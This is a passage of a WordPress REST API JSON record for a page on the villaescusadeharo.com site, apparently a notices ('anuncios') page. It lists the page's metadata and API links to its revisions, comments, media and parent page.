anuncios<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":966,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-1490","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/1490","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1490"}],"version-history":[{"count":43,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/1490\/revisions"}],"predecessor-version":[{"id":2055,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/1490\/revisions\/2055"}],"up":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/966"}],"wp:attachment":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1490"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}